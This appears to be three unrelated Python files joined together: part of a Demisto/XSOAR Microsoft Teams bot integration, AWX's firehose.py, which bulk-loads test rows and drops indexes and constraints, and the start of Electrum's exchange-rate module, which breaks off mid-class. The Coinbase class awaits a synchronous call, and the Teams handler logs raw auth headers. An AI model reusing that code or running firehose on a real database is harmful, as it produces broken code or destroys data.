demisto.results('Message was sent successfully.')
def mirror_investigation():
"""
Updates the integration context with a new or existing mirror.
"""
investigation: dict = demisto.investigation()
if investigation.get('type') == PLAYGROUND_INVESTIGATION_TYPE:
raise ValueError('Can not perform this action in playground.')
integration_context: dict = get_integration_context()
mirror_type: str = demisto.args().get('mirror_type', 'all')
auto_close: str = demisto.args().get('autoclose', 'true')
mirror_direction: str = demisto.args().get('direction', 'both').lower()
team_name: str = demisto.args().get('team', '')
if not team_name:
team_name = demisto.params().get('team', '')
team_aad_id: str = get_team_aad_id(team_name)
mirrored_channels: list = list()
teams: list = json.loads(integration_context.get('teams', '[]'))
team: dict = dict()
for team in teams:
if team.get('team_aad_id', '') == team_aad_id:
if team.get('mirrored_channels'):
mirrored_channels = team['mirrored_channels']
break
if mirror_direction != 'both':
mirror_type = f'{mirror_type}:{mirror_direction}'
investigation_id: str = investigation.get('id', '')
investigation_mirrored_index: int = is_investigation_mirrored(investigation_id, mirrored_channels)
if investigation_mirrored_index > -1:
# Updating channel mirror configuration
mirrored_channels[investigation_mirrored_index]['mirror_type'] = mirror_type
mirrored_channels[investigation_mirrored_index]['mirror_direction'] = mirror_direction
mirrored_channels[investigation_mirrored_index]['auto_close'] = auto_close
mirrored_channels[investigation_mirrored_index]['mirrored'] = False
demisto.results('Investigation mirror was updated successfully.')
else:
channel_name: str = demisto.args().get('channel_name', '') or f'incident-{investigation_id}'
channel_description: str = f'Channel to mirror incident {investigation_id}'
channel_id: str = create_channel(team_aad_id, channel_name, channel_description)
service_url: str = integration_context.get('service_url', '')
server_links: dict = demisto.demistoUrls()
server_link: str = server_links.get('server', '')
warroom_link: str = f'{server_link}#/WarRoom/{investigation_id}'
conversation: dict = {
'type': 'message',
'text': f'This channel was created to mirror [incident {investigation_id}]({warroom_link}) '
f'between Teams and Demisto. In order for your Teams messages to be mirrored in Demisto, '
f'you need to mention the Demisto Bot in the message.'
}
send_message_request(service_url, channel_id, conversation)
mirrored_channels.append({
'channel_id': channel_id,
'investigation_id': investigation_id,
'mirror_type': mirror_type,
'mirror_direction': mirror_direction,
'auto_close': auto_close,
'mirrored': False,
'channel_name': channel_name
})
demisto.results(f'Investigation mirrored successfully in channel {channel_name}.')
team['mirrored_channels'] = mirrored_channels
integration_context['teams'] = json.dumps(teams)
set_integration_context(integration_context)
def channel_mirror_loop():
"""
Runs in a long running container - checking for newly mirrored investigations.
"""
while True:
found_channel_to_mirror: bool = False
integration_context = {}
try:
integration_context = get_integration_context()
teams: list = json.loads(integration_context.get('teams', '[]'))
for team in teams:
mirrored_channels = team.get('mirrored_channels', [])
channel: dict
for channel in mirrored_channels:
investigation_id = channel.get('investigation_id', '')
if not channel['mirrored']:
demisto.info(f'Mirroring incident: {investigation_id} in Microsoft Teams')
channel_to_update: dict = channel
if channel_to_update['mirror_direction'] and channel_to_update['mirror_type']:
demisto.mirrorInvestigation(
channel_to_update['investigation_id'],
channel_to_update['mirror_type'],
bool(strtobool(channel_to_update['auto_close']))
)
channel_to_update['mirrored'] = True
demisto.info(f'Mirrored incident: {investigation_id} to Microsoft Teams successfully')
else:
demisto.info(f'Could not mirror {investigation_id}')
team['mirrored_channels'] = mirrored_channels
integration_context['teams'] = json.dumps(teams)
set_integration_context(integration_context)
found_channel_to_mirror = True
break
if found_channel_to_mirror:
break
except json.decoder.JSONDecodeError as json_decode_error:
demisto.error(
f'An error occurred in channel mirror loop while trying to deserialize teams from cache: '
f'{str(json_decode_error)}'
)
demisto.debug(f'Cache object: {integration_context}')
demisto.updateModuleHealth(f'An error occurred: {str(json_decode_error)}')
except Exception as e:
demisto.error(f'An error occurred in channel mirror loop: {str(e)}')
demisto.updateModuleHealth(f'An error occurred: {str(e)}')
finally:
time.sleep(5)
def member_added_handler(integration_context: dict, request_body: dict, channel_data: dict):
"""
Handles member added activity
:param integration_context: Cached object to retrieve relevant data from
:param request_body: Activity payload
:param channel_data: Microsoft Teams tenant, team and channel details
:return: None
"""
bot_id = demisto.params().get('bot_id')
team: dict = channel_data.get('team', {})
team_id: str = team.get('id', '')
team_aad_id: str = team.get('aadGroupId', '')
team_name: str = team.get('name', '')
tenant: dict = channel_data.get('tenant', {})
tenant_id: str = tenant.get('id', '')
recipient: dict = request_body.get('recipient', {})
recipient_name: str = recipient.get('name', '')
members_added: list = request_body.get('membersAdded', [])
teams: list = json.loads(integration_context.get('teams', '[]'))
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
for member in members_added:
member_id = member.get('id', '')
if bot_id in member_id:
# The bot was added to a team, caching team ID and team members
demisto.info(f'The bot was added to team {team_name}')
integration_context['tenant_id'] = tenant_id
integration_context['bot_name'] = recipient_name
break
team_members: list = get_team_members(service_url, team_id)
found_team: bool = False
for team in teams:
if team.get('team_aad_id', '') == team_aad_id:
team['team_members'] = team_members
found_team = True
break
if not found_team:
# Didn't found an existing team, adding new team object
teams.append({
'team_aad_id': team_aad_id,
'team_id': team_id,
'team_name': team_name,
'team_members': team_members
})
integration_context['teams'] = json.dumps(teams)
set_integration_context(integration_context)
def direct_message_handler(integration_context: dict, request_body: dict, conversation: dict, message: str):
"""
Handles a direct message sent to the bot
:param integration_context: Cached object to retrieve relevant data from
:param request_body: Activity payload
:param conversation: Conversation object sent
:param message: The direct message sent
:return: None
"""
conversation_id: str = conversation.get('id', '')
from_property: dict = request_body.get('from', {})
user_id: str = from_property.get('id', '')
team_member: dict = get_team_member(integration_context, user_id)
username: str = team_member.get('username', '')
user_email: str = team_member.get('user_email', '')
formatted_message: str = str()
attachment: dict = dict()
return_card: bool = False
allow_external_incidents_creation: bool = demisto.params().get('allow_external_incidents_creation', False)
lowered_message = message.lower()
if lowered_message.find('incident') != -1 and (lowered_message.find('create') != -1
or lowered_message.find('open') != -1
or lowered_message.find('new') != -1):
if user_email:
demisto_user = demisto.findUser(email=user_email)
else:
demisto_user = demisto.findUser(username=username)
if not demisto_user and not allow_external_incidents_creation:
data = 'You are not allowed to create incidents.'
else:
data = process_incident_create_message(demisto_user, message)
formatted_message = urlify_hyperlinks(data)
else:
try:
data = demisto.directMessage(message, username, user_email, allow_external_incidents_creation)
return_card = True
if data.startswith('`'): # We got a list of incidents/tasks:
data_by_line: list = data.replace('```', '').strip().split('\n')
return_card = True
if data_by_line[0].startswith('Task'):
attachment = process_tasks_list(data_by_line)
else:
attachment = process_incidents_list(data_by_line)
else: # Mirror investigation command / unknown direct message
attachment = process_mirror_or_unknown_message(data)
except Exception as e:
data = str(e)
if return_card:
conversation = {
'type': 'message',
'attachments': [attachment]
}
else:
formatted_message = formatted_message or data
conversation = {
'type': 'message',
'text': formatted_message
}
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
send_message_request(service_url, conversation_id, conversation)
def entitlement_handler(integration_context: dict, request_body: dict, value: dict, conversation_id: str):
"""
Handles activity the bot received as part of TeamsAsk flow, which includes entitlement
:param integration_context: Cached object to retrieve relevant data from
:param request_body: Activity payload
:param value: Object which includes
:param conversation_id: Message conversation ID
:return: None
"""
response: str = value.get('response', '')
entitlement_guid: str = value.get('entitlement', '')
investigation_id: str = value.get('investigation_id', '')
task_id: str = value.get('task_id', '')
from_property: dict = request_body.get('from', {})
team_members_id: str = from_property.get('id', '')
team_member: dict = get_team_member(integration_context, team_members_id)
demisto.handleEntitlementForUser(
incidentID=investigation_id,
guid=entitlement_guid,
taskID=task_id,
email=team_member.get('user_email', ''),
content=response
)
activity_id: str = request_body.get('replyToId', '')
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
update_message(service_url, conversation_id, activity_id, 'Your response was submitted successfully.')
def message_handler(integration_context: dict, request_body: dict, channel_data: dict, message: str):
"""
Handles a message in which the bot was mentioned
:param integration_context: Cached object to retrieve relevant data from
:param request_body: Activity payload
:param channel_data: Microsoft Teams tenant, team and channel details
:param message: The message which was sent mentioning the bot
:return: None
"""
channel: dict = channel_data.get('channel', {})
channel_id: str = channel.get('id', '')
team_id: str = channel_data.get('team', {}).get('id', '')
from_property: dict = request_body.get('from', {})
team_member_id: str = from_property.get('id', '')
if integration_context.get('teams'):
teams: list = json.loads(integration_context['teams'])
for team in teams:
if team.get('team_id', '') == team_id:
mirrored_channels: list = team.get('mirrored_channels', [])
for mirrored_channel in mirrored_channels:
if mirrored_channel.get('channel_id') == channel_id:
if mirrored_channel.get('mirror_direction', '') != 'FromDemisto' \
and 'none' not in mirrored_channel.get('mirror_type', ''):
investigation_id: str = mirrored_channel.get('investigation_id', '')
username: str = from_property.get('name', '')
user_email: str = get_team_member(integration_context, team_member_id).get('user_email', '')
demisto.addEntry(
id=investigation_id,
entry=message,
username=username,
email=user_email,
footer=f'\n**{ENTRY_FOOTER}**'
)
return
@APP.route('/', methods=['POST'])
def messages() -> Response:
"""
Main handler for messages sent to the bot
"""
demisto.debug('Processing POST query...')
headers: dict = cast(Dict[Any, Any], request.headers)
if validate_auth_header(headers) is False:
demisto.info(f'Authorization header failed: {str(headers)}')
else:
request_body: dict = request.json
integration_context: dict = get_integration_context()
service_url: str = request_body.get('serviceUrl', '')
if service_url:
service_url = service_url[:-1] if service_url.endswith('/') else service_url
integration_context['service_url'] = service_url
set_integration_context(integration_context)
channel_data: dict = request_body.get('channelData', {})
event_type: str = channel_data.get('eventType', '')
conversation: dict = request_body.get('conversation', {})
conversation_type: str = conversation.get('conversationType', '')
conversation_id: str = conversation.get('id', '')
message_text: str = request_body.get('text', '')
# Remove bot mention
bot_name = integration_context.get('bot_name', '')
formatted_message: str = message_text.replace(f'<at>{bot_name}</at>', '')
value: dict = request_body.get('value', {})
if event_type == 'teamMemberAdded':
demisto.info('New Microsoft Teams team member was added')
member_added_handler(integration_context, request_body, channel_data)
elif value:
# In TeamsAsk process
demisto.info('Got response from user in MicrosoftTeamsAsk process')
entitlement_handler(integration_context, request_body, value, conversation_id)
elif conversation_type == 'personal':
demisto.info('Got direct message to the bot')
direct_message_handler(integration_context, request_body, conversation, formatted_message)
else:
demisto.info('Got message mentioning the bot')
message_handler(integration_context, request_body, channel_data, formatted_message)
demisto.info('Finished processing Microsoft Teams activity successfully')
demisto.updateModuleHealth('')
return Response(status=200)
def ring_user_request(call_request_data):
return http_request(method='POST', url=f'{GRAPH_BASE_URL}/v1.0/communications/calls',
json_=call_request_data)
def ring_user():
"""Rings a user on Teams.
Notes:
This is a ring only! no media plays in case the generated call is answered.
Returns:
None.
"""
bot_id = demisto.params().get('bot_id')
integration_context: dict = get_integration_context()
tenant_id: str = integration_context.get('tenant_id', '')
if not tenant_id:
raise ValueError(
'Did not receive tenant ID from Microsoft Teams, verify the messaging endpoint is configured correctly. '
'See https://xsoar.pan.dev/docs/reference/integrations/microsoft-teams#troubleshooting for more information'
)
# get user to call name and id
username_to_call = demisto.args().get('username')
user: list = get_user(username_to_call)
if not (user and user[0].get('id')):
raise ValueError(f'User {username_to_call} was not found')
call_request_data = {
"@odata.type": "#microsoft.graph.call",
"callbackUri": 'https://callback.url',
"direction": "outgoing",
"source": {
"@odata.type": "#microsoft.graph.participantInfo",
"identity": {
"@odata.type": "#microsoft.graph.identitySet",
"application": {
"@odata.type": "#microsoft.graph.identity",
"id": bot_id
}
}
},
"targets": [
{
"@odata.type": "#microsoft.graph.invitationParticipantInfo",
"identity": {
"@odata.type": "#microsoft.graph.identitySet",
"user": {
"@odata.type": "#microsoft.graph.identity",
"displayName": username_to_call,
"id": user[0].get('id')
}
}
}
],
"requestedModalities": [
"audio"
],
"mediaConfig": {
"@odata.type": "#microsoft.graph.serviceHostedMediaConfig",
},
"tenantId": tenant_id
}
response = ring_user_request(call_request_data)
return_outputs(f"Calling {username_to_call}", {}, response)
def long_running_loop():
"""
The infinite loop which runs the mirror loop and the bot app in two different threads
"""
while True:
certificate: str = demisto.params().get('certificate', '')
private_key: str = demisto.params().get('key', '')
certificate_path = str()
private_key_path = str()
server = None
try:
port_mapping: str = PARAMS.get('longRunningPort', '')
port: int
if port_mapping:
if ':' in port_mapping:
port = int(port_mapping.split(':')[1])
else:
port = int(port_mapping)
else:
raise ValueError('No port mapping was provided')
Thread(target=channel_mirror_loop, daemon=True).start()
demisto.info('Started channel mirror loop thread')
ssl_args = dict()
if certificate and private_key:
certificate_file = NamedTemporaryFile(delete=False)
certificate_path = certificate_file.name
certificate_file.write(bytes(certificate, 'utf-8'))
certificate_file.close()
ssl_args['certfile'] = certificate_path
private_key_file = NamedTemporaryFile(delete=False)
private_key_path = private_key_file.name
private_key_file.write(bytes(private_key, 'utf-8'))
private_key_file.close()
ssl_args['keyfile'] = private_key_path
demisto.info('Starting HTTPS Server')
else:
demisto.info('Starting HTTP Server')
server = WSGIServer(('0.0.0.0', port), APP, **ssl_args)
demisto.updateModuleHealth('')
server.serve_forever()
except Exception as e:
error_message = str(e)
demisto.error(f'An error occurred in long running loop: {error_message} - {format_exc()}')
demisto.updateModuleHealth(f'An error occurred: {error_message}')
finally:
if certificate_path:
os.unlink(certificate_path)
if private_key_path:
os.unlink(private_key_path)
if server:
server.stop()
time.sleep(5)
def test_module():
"""
Tests token retrieval for Bot Framework API
"""
get_bot_access_token()
demisto.results('ok')
def main():
""" COMMANDS MANAGER / SWITCH PANEL """
commands: dict = {
'test-module': test_module,
'long-running-execution': long_running_loop,
'send-notification': send_message,
'mirror-investigation': mirror_investigation,
'close-channel': close_channel,
'microsoft-teams-integration-health': integration_health,
'create-channel': create_channel_command,
'add-user-to-channel': add_user_to_channel_command,
# 'microsoft-teams-create-team': create_team,
# 'microsoft-teams-send-file': send_file,
'microsoft-teams-ring-user': ring_user,
'microsoft-teams-create-channel': create_channel_command,
'microsoft-teams-add-user-to-channel': add_user_to_channel_command,
'microsoft-teams-create-meeting': create_meeting_command,
}
''' EXECUTION '''
try:
handle_proxy()
command: str = demisto.command()
LOG(f'Command being called is {command}')
if command in commands.keys():
commands[command]()
# Log exceptions
except Exception as e:
return_error(f'{str(e)} - {format_exc()}')
if __name__ == 'builtins':
main()
|
firehose.py
|
#! /usr/bin/env awx-python
#
# !!! READ BEFORE POINTING THIS AT YOUR FOOT !!!
#
# This script attempts to connect to an AWX database and insert (by default)
# a billion main_jobevent rows as screamingly fast as possible.
#
# tl;dr for best results, feed it high IOPS.
#
# this script exists *solely* for the purpose of generating *test* data very
# quickly; do *not* point this at a production installation or you *will* be
# very unhappy
#
# Before running this script, you should give postgres *GOBS* of memory
# and disk so it can create indexes and constraints as quickly as possible.
# In fact, it's probably not smart to attempt this on anything less than 8 core,
# 32GB of RAM, and tens of thousands of IOPS.
#
# Also, a billion events is a *lot* of data; make sure you've
# provisioned *at least* 750GB of disk space
#
# if you want this script to complete in a few hours, a good starting point
# is something like m5.4xlarge w/ 1TB provisioned IOPS SSD (io1)
#
import argparse
import datetime
import json
import multiprocessing
import pkg_resources
import subprocess
import sys
from io import StringIO
from time import time
from random import randint
from uuid import uuid4
import psycopg2
from django import setup as setup_django
from django.db import connection
from django.db.models.sql import InsertQuery
from django.utils.timezone import now
db = json.loads(
subprocess.check_output(
['awx-manage', 'print_settings', 'DATABASES', '--format', 'json']
)
)
name = db['DATABASES']['default']['NAME']
user = db['DATABASES']['default']['USER']
pw = db['DATABASES']['default']['PASSWORD']
host = db['DATABASES']['default']['HOST']
dsn = f'dbname={name} user={user} password={pw} host={host}'
u = str(uuid4())
STATUS_OPTIONS = ('successful', 'failed', 'error', 'canceled')
class YieldedRows(StringIO):
def __init__(self, job_id, rows, *args, **kwargs):
self.rows = rows
self.row = "\t".join([
"2020-01-02 12:00:00",
"2020-01-02 12:00:01",
"playbook_on_start",
"{}",
'false',
'false',
"localhost",
"Example Play",
"Hello World",
"",
"0",
"1",
job_id,
u,
"",
"1",
"hello_world.yml",
"0",
"X",
"1",
]) + '\n'
def read(self, x):
if self.rows <= 0:
self.close()
return ''
self.rows -= 10000
return self.row * 10000
def firehose(job, count):
conn = psycopg2.connect(dsn)
f = YieldedRows(job, count)
with conn.cursor() as cursor:
cursor.copy_expert((
'COPY '
'main_jobevent('
'created, modified, event, event_data, failed, changed, '
'host_name, play, role, task, counter, host_id, job_id, uuid, '
'parent_uuid, end_line, playbook, start_line, stdout, verbosity'
') '
'FROM STDIN'
), f, size=1024 * 1000)
conn.commit()
conn.close()
def cleanup(sql):
print(sql)
conn = psycopg2.connect(dsn)
with conn.cursor() as cursor:
cursor.execute(sql)
conn.commit()
conn.close()
def generate_jobs(jobs, batch_size):
print(f'inserting {jobs} job(s)')
sys.path.insert(0, pkg_resources.get_distribution('awx').module_path)
from awx import prepare_env
prepare_env()
setup_django()
from awx.main.models import UnifiedJob, Job, JobTemplate
fields = list(set(Job._meta.fields) - set(UnifiedJob._meta.fields))
job_field_names = set([f.attname for f in fields])
# extra unified job field names from base class
for field_name in ('name', 'created_by_id', 'modified_by_id'):
job_field_names.add(field_name)
jt_count = JobTemplate.objects.count()
def make_batch(N, jt_pos=0):
jt = None
while not jt:
try:
jt = JobTemplate.objects.all()[jt_pos % jt_count]
except IndexError as e:
# seems to happen every now and then due to some race condition
print('Warning: IndexError on {} JT, error: {}'.format(
jt_pos % jt_count, e
))
jt_pos += 1
jt_defaults = dict(
(f.attname, getattr(jt, f.attname))
for f in JobTemplate._meta.get_fields()
if f.concrete and f.attname in job_field_names and getattr(jt, f.attname)
)
jt_defaults['job_template_id'] = jt.pk
jt_defaults['unified_job_template_id'] = jt.pk # populated by save method
jobs = [
Job(
status=STATUS_OPTIONS[i % len(STATUS_OPTIONS)],
started=now(), created=now(), modified=now(), finished=now(),
elapsed=0., **jt_defaults)
for i in range(N)
]
ujs = UnifiedJob.objects.bulk_create(jobs)
query = InsertQuery(Job)
query.insert_values(fields, ujs)
with connection.cursor() as cursor:
query, params = query.sql_with_params()[0]
cursor.execute(query, params)
return ujs[-1], jt_pos
i = 1
jt_pos = 0
s = time()
while jobs > 0:
s_loop = time()
print('running batch {}, runtime {}'.format(i, time() - s))
created, jt_pos = make_batch(min(jobs, batch_size), jt_pos)
print('took {}'.format(time() - s_loop))
i += 1
jobs -= batch_size
return created
def generate_events(events, job):
conn = psycopg2.connect(dsn)
cursor = conn.cursor()
print('removing indexes and constraints')
# get all the indexes for main_jobevent
try:
# disable WAL to drastically increase write speed
# we're not doing replication, and the goal of this script is to just
# insert data as quickly as possible without concern for the risk of
# data loss on crash
# see: https://www.compose.com/articles/faster-performance-with-unlogged-tables-in-postgresql/
cursor.execute('ALTER TABLE main_jobevent SET UNLOGGED')
cursor.execute("SELECT indexname, indexdef FROM pg_indexes WHERE tablename='main_jobevent' AND indexname != 'main_jobevent_pkey';")
indexes = cursor.fetchall()
cursor.execute("SELECT conname, contype, pg_catalog.pg_get_constraintdef(r.oid, true) as condef FROM pg_catalog.pg_constraint r WHERE r.conrelid = 'main_jobevent'::regclass AND conname != 'main_jobevent_pkey';")
constraints = cursor.fetchall()
# drop all indexes for speed
for indexname, indexdef in indexes:
cursor.execute(f'DROP INDEX IF EXISTS {indexname}')
print(f'DROP INDEX IF EXISTS {indexname}')
for conname, contype, condef in constraints:
cursor.execute(f'ALTER TABLE main_jobevent DROP CONSTRAINT IF EXISTS {conname}')
print(f'ALTER TABLE main_jobevent DROP CONSTRAINT IF EXISTS {conname}')
conn.commit()
print(f'attaching {events} events to job {job}')
cores = multiprocessing.cpu_count()
workers = []
for i in range(cores):
p = multiprocessing.Process(target=firehose, args=(job, events / cores))
p.daemon = True
workers.append(p)
for w in workers:
w.start()
for w in workers:
w.join()
workers = []
print('generating unique start/end line counts')
cursor.execute('CREATE SEQUENCE IF NOT EXISTS firehose_seq;')
cursor.execute('CREATE SEQUENCE IF NOT EXISTS firehose_line_seq MINVALUE 0;')
cursor.execute('ALTER SEQUENCE firehose_seq RESTART WITH 1;')
cursor.execute('ALTER SEQUENCE firehose_line_seq RESTART WITH 0;')
cursor.execute("SELECT nextval('firehose_line_seq')")
conn.commit()
cursor.execute(
"UPDATE main_jobevent SET "
"counter=nextval('firehose_seq')::integer,"
"start_line=nextval('firehose_line_seq')::integer,"
"end_line=currval('firehose_line_seq')::integer + 2 "
f"WHERE job_id={job}"
)
conn.commit()
finally:
# restore all indexes
print(datetime.datetime.utcnow().isoformat())
print('restoring indexes and constraints (this may take awhile)')
workers = []
for indexname, indexdef in indexes:
p = multiprocessing.Process(target=cleanup, args=(indexdef,))
p.daemon = True
workers.append(p)
for w in workers:
w.start()
for w in workers:
w.join()
for conname, contype, condef in constraints:
if contype == 'c':
# if there are any check constraints, don't add them back
# (historically, these are > 0 checks, which are basically
# worthless, because Ansible doesn't emit counters, line
# numbers, verbosity, etc... < 0)
continue
sql = f'ALTER TABLE main_jobevent ADD CONSTRAINT {conname} {condef}'
cleanup(sql)
conn.close()
print(datetime.datetime.utcnow().isoformat())
if __name__ == '__main__':
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
'--jobs', type=int, help='Number of jobs to create.',
default=1000000) # 1M by default
parser.add_argument(
'--events', type=int, help='Number of events to create.',
default=1000000000) # 1B by default
parser.add_argument(
'--batch-size', type=int, help='Number of jobs to create in a single batch.',
default=1000)
params = parser.parse_args()
jobs = params.jobs
events = params.events
batch_size = params.batch_size
print(datetime.datetime.utcnow().isoformat())
created = generate_jobs(jobs, batch_size=batch_size)
generate_events(events, str(created.pk))
|
exchange_rate.py
|
from datetime import datetime
import inspect
import requests
import sys
import os
import json
from threading import Thread
import time
import csv
import decimal
from decimal import Decimal
from .bitcoin import COIN
from .i18n import _
from .util import PrintError, ThreadJob
# See https://en.wikipedia.org/wiki/ISO_4217
CCY_PRECISIONS = {'BHD': 3, 'BIF': 0, 'BYR': 0, 'CLF': 4, 'CLP': 0,
'CVE': 0, 'DJF': 0, 'GNF': 0, 'IQD': 3, 'ISK': 0,
'JOD': 3, 'JPY': 0, 'KMF': 0, 'KRW': 0, 'KWD': 3,
'LYD': 3, 'MGA': 1, 'MRO': 1, 'OMR': 3, 'PYG': 0,
'RWF': 0, 'TND': 3, 'UGX': 0, 'UYI': 0, 'VND': 0,
'VUV': 0, 'XAF': 0, 'XAU': 4, 'XOF': 0, 'XPF': 0}
class ExchangeBase(PrintError):
def __init__(self, on_quotes, on_history):
self.history = {}
self.quotes = {}
self.on_quotes = on_quotes
self.on_history = on_history
def get_json(self, site, get_string):
# APIs must have https
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={'User-Agent' : 'Electrum'}, timeout=10)
return response.json()
def get_csv(self, site, get_string):
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={'User-Agent' : 'Electrum'})
reader = csv.DictReader(response.content.decode().split('\n'))
return list(reader)
def name(self):
return self.__class__.__name__
def update_safe(self, ccy):
try:
self.print_error("getting fx quotes for", ccy)
self.quotes = self.get_rates(ccy)
self.print_error("received fx quotes")
except BaseException as e:
self.print_error("failed fx quotes:", e)
self.on_quotes()
def update(self, ccy):
t = Thread(target=self.update_safe, args=(ccy,))
t.setDaemon(True)
t.start()
def read_historical_rates(self, ccy, cache_dir):
filename = os.path.join(cache_dir, self.name() + '_'+ ccy)
if os.path.exists(filename):
timestamp = os.stat(filename).st_mtime
try:
with open(filename, 'r', encoding='utf-8') as f:
h = json.loads(f.read())
h['timestamp'] = timestamp
except:
h = None
else:
h = None
if h:
self.history[ccy] = h
self.on_history()
return h
def get_historical_rates_safe(self, ccy, cache_dir):
try:
self.print_error("requesting fx history for", ccy)
h = self.request_history(ccy)
self.print_error("received fx history for", ccy)
except BaseException as e:
self.print_error("failed fx history:", e)
return
filename = os.path.join(cache_dir, self.name() + '_' + ccy)
with open(filename, 'w', encoding='utf-8') as f:
f.write(json.dumps(h))
h['timestamp'] = time.time()
self.history[ccy] = h
self.on_history()
def get_historical_rates(self, ccy, cache_dir):
if ccy not in self.history_ccys():
return
h = self.history.get(ccy)
if h is None:
h = self.read_historical_rates(ccy, cache_dir)
if h is None or h['timestamp'] < time.time() - 24*3600:
t = Thread(target=self.get_historical_rates_safe, args=(ccy, cache_dir))
t.setDaemon(True)
t.start()
def history_ccys(self):
return []
def historical_rate(self, ccy, d_t):
return self.history.get(ccy, {}).get(d_t.strftime('%Y-%m-%d'), 'NaN')
def get_currencies(self):
rates = self.get_rates('')
return sorted([str(a) for (a, b) in rates.items() if b is not None and len(a)==3])
class BitcoinAverage(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('apiv2.bitcoinaverage.com', '/indices/global/ticker/short')
return dict([(r.replace("BTC", ""), Decimal(json[r]['last']))
for r in json if r != 'timestamp'])
def history_ccys(self):
return ['AUD', 'BRL', 'CAD', 'CHF', 'CNY', 'EUR', 'GBP', 'IDR', 'ILS',
'MXN', 'NOK', 'NZD', 'PLN', 'RON', 'RUB', 'SEK', 'SGD', 'USD',
'ZAR']
def request_history(self, ccy):
history = self.get_csv('apiv2.bitcoinaverage.com',
"/indices/global/history/BTC%s?period=alltime&format=csv" % ccy)
return dict([(h['DateTime'][:10], h['Average'])
for h in history])
class Bitcointoyou(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('bitcointoyou.com', "/API/ticker.aspx")
return {'BRL': Decimal(json['ticker']['last'])}
def history_ccys(self):
return ['BRL']
class BitcoinVenezuela(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitcoinvenezuela.com', '/')
rates = [(r, json['BTC'][r]) for r in json['BTC']
if json['BTC'][r] is not None] # Giving NULL for LTC
return dict(rates)
def history_ccys(self):
return ['ARS', 'EUR', 'USD', 'VEF']
def request_history(self, ccy):
return self.get_json('api.bitcoinvenezuela.com',
"/historical/index.php?coin=BTC")[ccy +'_BTC']
class Bitbank(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('public.bitbank.cc', '/btc_jpy/ticker')
return {'JPY': Decimal(json['data']['last'])}
class BitFlyer(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('bitflyer.jp', '/api/echo/price')
return {'JPY': Decimal(json['mid'])}
class Bitmarket(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.bitmarket.pl', '/json/BTCPLN/ticker.json')
return {'PLN': Decimal(json['last'])}
class BitPay(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('bitpay.com', '/api/rates')
return dict([(r['code'], Decimal(r['rate'])) for r in json])
class Bitso(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitso.com', '/v2/ticker')
return {'MXN': Decimal(json['last'])}
class BitStamp(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('www.bitstamp.net', '/api/ticker/')
return {'USD': Decimal(json['last'])}
class Bitvalor(ExchangeBase):
def get_rates(self,ccy):
json = self.get_json('api.bitvalor.com', '/v1/ticker.json')
return {'BRL': Decimal(json['ticker_1h']['total']['last'])}
class BlockchainInfo(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('blockchain.info', '/ticker')
return dict([(r, Decimal(json[r]['15m'])) for r in json])
class BTCChina(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('data.btcchina.com', '/data/ticker')
return {'CNY': Decimal(json['ticker']['last'])}
class BTCParalelo(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('btcparalelo.com', '/api/price')
return {'VEF': Decimal(json['price'])}
class Coinbase(ExchangeBase):
async def get_rates(self, ccy):
json = await self.get_json('api.coinbase.com',
'/v2/exchange-rates?currency=BTC')
return {ccy: Decimal(rate) for (ccy, rate) in json["data"]["rates"].items()}
class CoinDesk(ExchangeBase):
def get_currencies(self):
dicts = self.get_json('api.coindesk.com',
'/v1/bpi/supported-currencies.json')
return [d['currency'] for d in dicts]
def get_rates(self, ccy):
json = self.get_json('api.coindesk.com',
'/v1/bpi/currentprice/%s.json' % ccy)
result = {ccy: Decimal(json['bpi'][ccy]['rate_float'])}
return result
def history_starts(self):
return { 'USD': '2012-11-30', 'EUR': '2013-09-01' }
def history_ccys(self):
return self.history_starts().keys()
def request_history(self, ccy):
start = self.history_starts()[ccy]
end = datetime.today().strftime('%Y-%m-%d')
# Note ?currency and ?index don't work as documented. Sigh.
query = ('/v1/bpi/historical/close.json?start=%s&end=%s'
% (start, end))
json = self.get_json('api.coindesk.com', query)
return json['bpi']
class Coinsecure(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.coinsecure.in', '/v0/noauth/newticker')
return {'INR': Decimal(json['lastprice'] / 100.0 )}
class Foxbit(ExchangeBase):
def get_rates(self,ccy):
json = self.get_json('api.bitvalor.com', '/v1/ticker.json')
return {'BRL': Decimal(json['ticker_1h']['exchanges']['FOX']['last'])}
class itBit(ExchangeBase):
def get_rates(self, ccy):
ccys = ['USD', 'EUR', 'SGD']
json = self.get_json('api.itbit.com', '/v1/markets/XBT%s/ticker' % ccy)
result = dict.fromkeys(ccys)
if ccy in ccys:
result[ccy] = Decimal(json['lastPrice'])
return result
class Kraken(ExchangeBase):
def get_rates(self, ccy):
ccys = ['EUR', 'USD', 'CAD', 'GBP', 'JPY']
pairs = ['XBT%s' % c for c in ccys]
json = self.get_json('api.kraken.com',
'/0/public/Ticker?pair=%s' % ','.join(pairs))
return dict((k[-3:], Decimal(float(v['c'][0])))
for k, v in json['result'].items())
class LocalBitcoins(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('localbitcoins.com',
'/bitcoinaverage/ticker-all-currencies/')
return dict([(r, Decimal(json[r]['rates']['last'])) for r in json])
class MercadoBitcoin(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.bitvalor.com', '/v1/ticker.json')
return {'BRL': Decimal(json['ticker_1h']['exchanges']['MBT']['last'])}
class NegocieCoins(ExchangeBase):
